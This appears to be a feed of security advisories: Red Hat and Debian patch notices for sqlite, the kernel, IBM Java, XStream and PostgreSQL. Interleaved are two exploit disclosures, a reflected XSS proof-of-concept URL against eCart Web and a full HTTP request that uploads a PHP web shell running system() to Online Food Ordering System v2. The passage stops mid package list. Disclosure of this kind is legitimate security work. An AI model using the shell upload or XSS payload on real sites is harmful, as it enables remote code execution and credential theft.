Red Hat Security Advisory 2023-0110-01 - SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: sqlite security update  
Advisory ID:       RHSA-2023:0110-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0110  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-35737   
=====================================================================

1. Summary:

An update for sqlite is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

SQLite is a C library that implements an SQL database engine. A large  
subset of SQL92 is supported. A complete database is stored in a single  
disk file. The API is designed for convenience and ease of use.  
Applications that link against SQLite can enjoy the power and flexibility  
of an SQL database without the administrative hassles of supporting a  
separate database server.

Security Fix(es):

* sqlite: an array-bounds overflow if billions of bytes are used in a  
string argument to a C API (CVE-2022-35737)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110291 - CVE-2022-35737 sqlite: an array-bounds overflow if billions of bytes are used in a string argument to a C API

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
lemon-3.26.0-17.el8_7.aarch64.rpm  
lemon-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.aarch64.rpm

ppc64le:  
lemon-3.26.0-17.el8_7.ppc64le.rpm  
lemon-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debugsource-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.ppc64le.rpm

s390x:  
lemon-3.26.0-17.el8_7.s390x.rpm  
lemon-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debugsource-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.s390x.rpm

x86_64:  
lemon-3.26.0-17.el8_7.x86_64.rpm  
lemon-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
sqlite-3.26.0-17.el8_7.src.rpm

aarch64:  
lemon-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-3.26.0-17.el8_7.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.aarch64.rpm  
sqlite-devel-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.aarch64.rpm

noarch:  
sqlite-doc-3.26.0-17.el8_7.noarch.rpm

ppc64le:  
lemon-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debugsource-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-devel-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.ppc64le.rpm

s390x:  
lemon-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-3.26.0-17.el8_7.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debugsource-3.26.0-17.el8_7.s390x.rpm  
sqlite-devel-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.s390x.rpm

x86_64:  
lemon-debuginfo-3.26.0-17.el8_7.i686.rpm  
lemon-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-3.26.0-17.el8_7.i686.rpm  
sqlite-3.26.0-17.el8_7.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.i686.rpm  
sqlite-debugsource-3.26.0-17.el8_7.x86_64.rpm  
sqlite-devel-3.26.0-17.el8_7.i686.rpm  
sqlite-devel-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-3.26.0-17.el8_7.i686.rpm  
sqlite-libs-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i/9zjgjWX9erEAQhB3xAAjjssNOL1S2J0s5hcPZWxpjsGF88e97GR  
pn7k5YE7r1ICInJpHxB3AzHNYDI7gEGXBh+NvmZVOma9DflYRutXrjTuRnQbisxa  
PODEMyaeWbFATQnb2jZ057im74yvJCLwceH0BfV1WchiYQS5qZsErS1ZCtnkj+rz  
RNd1Og307yRJzYjnHeeNxYvHIAsRkuDER06wS9fkQjeOOSNJOoyro0ZG/NLbrDln  
ykSsV8CQGTVkoxz4OLgN+LSe65J6xX8oTRy9EjVS8u61CEnj61B3hOCWkZVj7dTt  
qevHQ2eqGaJQMpdkFaKdMkK7oJDMcB7u581zd73ekvpO9CQnWLa9BX+nJR5qTFRR  
hGXtMz9j+buqIhqeDD3JAAD/sH21D41tmkIQ4LgyixcA139jCXGfNcWyezi5GRBy  
eaehaiWoSyRt33RnspNL6nLNbDCsYsgHUlwaTaNfaoOGe0XwZ/B2PFD4TnLBhxb1  
HqtBsM9/AFPDGZguvwsu2pRJ3TiP9kYzW0Kb2t+0I5qiq9jS5nKboab68TDQRYr/  
zIR7jaC23uVW6/RRMCyIxbm+4ui7XEEsiskj/f22O9XHEr1NlWHQTTChQSXwgTQ9  
+LPsKHAhaTBh4puPBUNkdXoIrS7in9qwyabmmkOuMBN9hdf1WwM2uzPuSKHmo/Ny  
MFJ2qbkASWI=  
=kL2f  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0110-01

Debian Linux Security Advisory 5315-1 - XStream serializes Java objects to XML and back again. Versions prior to 1.4.15-3+deb11u2 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation of the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This update handles the stack overflow and raises an InputManipulationException instead.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5315-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
January 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libxstream-java  
CVE ID         : CVE-2022-41966  
Debian Bug     : 1027754

XStream serializes Java objects to XML and back again. Versions prior to  
1.4.15-3+deb11u2 may allow a remote attacker to terminate the application with  
a stack overflow error, resulting in a denial of service only via manipulation  
of the processed input stream. The attack uses the hash code implementation for  
collections and maps to force recursive hash calculation causing a stack  
overflow. This update handles the stack overflow and raises an  
InputManipulationException instead.

For the stable distribution (bullseye), this problem has been fixed in  
version 1.4.15-3+deb11u2.

We recommend that you upgrade your libxstream-java packages.

For the detailed security status of libxstream-java please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libxstream-java

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmO/OL9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSfkQ//eGEIBeKw3LJ+pWGUEk+Kehpv1nYJqo1Bg3QWhgKNXOTFMie7RqCUPZ3Q  
s+eEZwtOgVAR7tx51NKBUyho/Z9HOkaqYFwILrsJ8DO2CthjYw4RKM8UVio+M4OI  
4JWsiE8WxeaZX0ONa6Uz+qj8FVQYgsEWzHtvajkKevG8swEIhauhksU4FvLVA8xN  
Nldqvi42M42sEt1JHksF8f4vENWgAyK9y1C0xDCTwhUrs5uw/QU2bV5ibTJ1RwOz  
34a49SvVNPZNM8YAiHO+EP+l7eQnG9AZkZ6BUeeUg+vds7RV87LrCcsaWfcprotZ  
7w2UxZE16SrWEyWXdPxZFINxgotqXOVHB62NbbaN0CowN2NzQ48OFvORyoVm2mF4  
OdexkUNSdumj3aviu3Gq6cOPgYiPmQdPoL1BVu5xReliJednLhYanNY+epB/DzxS  
M1keuAChvG/6hqYsuuD86aQk7VZ+Mi2OzQYBUA05eQyswuesQnouXiOJs+jr3b2e  
ix+/D5Yuj3xEO06QllMqbHF9r8VlwhXN9/Be6/yJwyY5jvgHHWP3lKFpSJJ7dNu/  
PXTC7Po+iHOKdMyFSmevoX/FO+Hv+2WZ52+yX99RjNXaR7YVXXFO/tCeM663Dsba  
zgEa6jrlM5juDi6kNUTtFJ5yzCl6k+kvV84oP15my5BkDcFQ2jU=  
=Bf6i  
-----END PGP SIGNATURE-----

Debian Security Advisory 5315-1

eCart Web version 5.0.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : ecartmultivendorweb.thewrteam.in                                           ││  Vendor   : By WRTEAM Ekart.Com                                                        ││  Software : eCart Web 5.0.0 - Multi Vendor eCommerce Marketplace                       ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'category' is vulnerable to XSSPath: /shophttps://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1[-] Done

eCart Web 5.0.0 Cross Site Scripting

Red Hat Security Advisory 2023-0123-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0123-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0123  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-2.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-2.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-425_3_1-1-2.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-2.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i/NzjgjWX9erEAQjkhRAAobvxX9U+CJqUtMrpgkH9bKwP3tibH6Ct  
qKy1PFN2rQACX8MQcWg0rm7vhj9gxZr0hUwmFD4Df1Kw/Lb81mRanwRfR9WgEgyb  
DUIjUlxnYKbnR0dkAJkjlYeu9w+Mux9PVayF9xfe7Y/fu0nwpa9d4kgUlXVmgmGg  
oF5Xfg+UbzYwP/X8HCRyPlBds1PpN2n3ICTICC07d3ZuLWguS/r4EvqrGIjz3gPT  
qn9mUlMr1txrT24TXPY8ZkUK36v8vUkYKZrgkvCL4/ledXyGGnA03aCbvY16uGHV  
XBfoy0sd1nrdVzpWRLbgsiMpk5Rk4sby9wOrz4fo4vxW9vOAnta4bBUdMoPZOfTm  
bwsvD6TELncBIOdqTwqtwhNleulxwtcReNVYZ1SlbqcWrTDp3pgn+niYBO/arOQ7  
GgE+KqAOd/uoaa0IZZWIlStRJCNlvkb+2K/s+r/C89zPglmy4uBx2iMoDAkzjCGt  
zCYmHrIIFsblT6W5ekaww5zAgeH5/G47Mq+uVEJO1ZBJGG8vs12b1kvblx8Y8OBU  
kxSUjCFwff18i3lVMF/hYa/ff+CZxVLm077Dpymo+GTzqERhhd6jmplZAkJl7fyF  
WUxnHb7WgeGDyIlxe2/sjKenlZS421THK3LGqbGl2VZBTT4UJnGwBui2oj7YC+1F  
g5xbthsvB2w=  
=5lqj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0123-01

Red Hat Security Advisory 2023-0128-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR7-FP20. Issues addressed include a randomization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-ibm security update  
Advisory ID:       RHSA-2023:0128-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0128  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-21619 CVE-2022-21624 CVE-2022-21626   
                   CVE-2022-21628   
=====================================================================

1. Summary:

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Supplementary (v. 8) - ppc64le, s390x, x86_64

3. Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM  
Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR7-FP20.

Security Fix(es):

* OpenJDK: excessive memory allocation in X.509 certificate parsing  
(Security, 8286533) (CVE-2022-21626)

* OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server,  
8286918) (CVE-2022-21628)

* OpenJDK: improper handling of long NTLM client hostnames (Security,  
8286526) (CVE-2022-21619)

* OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI,  
8286910) (CVE-2022-21624)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of IBM Java must be restarted for this update to take  
effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133745 - CVE-2022-21619 OpenJDK: improper handling of long NTLM client hostnames (Security, 8286526)  
2133753 - CVE-2022-21626 OpenJDK: excessive memory allocation in X.509 certificate parsing (Security, 8286533)  
2133765 - CVE-2022-21624 OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI, 8286910)  
2133769 - CVE-2022-21628 OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server, 8286918)

6. Package List:

Red Hat Enterprise Linux Supplementary (v. 8):

ppc64le:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.ppc64le.rpm  
java-1.8.0-ibm-webstart-1.8.0.7.20-1.el8_7.ppc64le.rpm

s390x:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.s390x.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.s390x.rpm

x86_64:  
java-1.8.0-ibm-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-demo-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-devel-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-headless-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-jdbc-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-plugin-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-src-1.8.0.7.20-1.el8_7.x86_64.rpm  
java-1.8.0-ibm-webstart-1.8.0.7.20-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i+tzjgjWX9erEAQgXZhAAnPO4wozg4xq9yVOJ3Ena/VncnYPboIzf  
wV07vvXXaO4oYNyV0rTVYH6vM26ZMpG949nlcpXAtv3DKHyCpLXFS9qHmFseQ3nC  
PEPHuBZaT5LEU/v/tyaj24UYR/t2RnaLeycHKfzWhPhs6YChB5XuhQwQkAtJT7uE  
6VXj6JNSI58jLC1eFkQNoXs2W0k+TKw8ZmZUMcnCqmXTAyGUSlwxr2XGQTvPiKFY  
yL3b5+hOeuXIVdgsk+wdCGE4kelsB05fUtpVTxvDyrSxtYdHYRsQ33VuDTMJU81R  
Ib/KdMEBHX5T3PPuv0HZb3R82a97BBlKuYSTmaJzgBuP4JgynMe0JUU5eof4W2lG  
fQU8a9Gfx7BRO+Tp3npDsFNPuMAWU7Q8G90dmpYKo5neebpxJBvBYiHRySrZxEd2  
b6o7/DcT1Hc4jocrtrv6T4jYXerVM9f5f4JBGaE+NlBdWWw8B/ffeB81hBqgooKE  
yPxg1PmWrh2tyD3EEVNEa801EKT0uyh8HJd60M4Tltej81G/eUAlUjQc2RypZlIl  
j+uDjeBFVVHL8ESjhAgbCcL2LAhZa/VMRkh9wa5xGT8gCY3nJNhwOdtoUru6QbH4  
zJWVBXI24tj5MfdK6BGWtywTOLlm3XwOt9eZsnMvC7e/WuRYLNcRjvBTUnjZTgBo  
kEylWEHnWb4=  
=sUX9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0128-01

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/11/2023  
# Exploit Author: Onurcan Alcan  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Macos / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38679779537855109463517942658  
Content-Length: 1225  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=menu  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="id"

1  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="name"

Diet Coke  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="description"

In Can  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="status"

on  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="category_id"

3  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="price"

20  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="img"; filename="revcmd.php"  
Content-Type: text/php

<?  
?>  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<?  
if($_GET['cmd']) {  
  system($_GET['cmd']);  
  }  
?>  
</pre>  
</BODY></HTML>

-----------------------------38679779537855109463517942658--

Online Food Ordering System 2.0 Shell Upload

Red Hat Security Advisory 2023-0113-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:0113-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0113  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2625   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Extension scripts replace objects not belonging to the  
extension. (CVE-2022-2625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2113825 - CVE-2022-2625 postgresql: Extension scripts replace objects not belonging to the extension.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.src.rpm

aarch64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
